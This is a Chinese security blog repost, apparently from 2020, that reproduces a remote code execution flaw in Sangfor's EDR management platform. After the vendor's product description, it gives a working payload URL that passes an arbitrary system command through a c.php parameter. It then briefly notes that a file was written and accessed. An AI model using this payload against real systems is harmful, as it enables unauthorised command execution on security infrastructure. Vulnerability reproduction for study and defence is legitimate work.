记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

EDR终端检测平台-RCE漏洞复现

2020-08-20 06:00

昨晚通宵,刚刚睡醒发现群里面炸锅了-EDR终端检测平台RCE

自己也来看看。


简介:

EDR简介(来自官方):

终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。

EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。

端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。

深信服的 EDR产品也支持与AC、SIP、AF、SOC、X-central产品的联动协同响应,形成新一代的安全防护体系。

PAYLOAD:

https://xxx.xxx/tool/log/c.php?strip_slashes=system&host=whoami

读取页面:

写文件 123

写入成功

访问123

参考链接:

https://www.cnblogs.com/potatsoSec/p/13520546.html

https://mp.weixin.qq.com/s/4VtJ_M0c5GZsV4CmBr9CsQ

https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=118295

转自:https://mp.weixin.qq.com/s/KVhd7ifkuD5U28NUUbGrTg



知识来源: www.safebase.cn/article-261404-1.html

阅读:34722 | 评论:0 | 标签:安全报 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“EDR终端检测平台-RCE漏洞复现”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云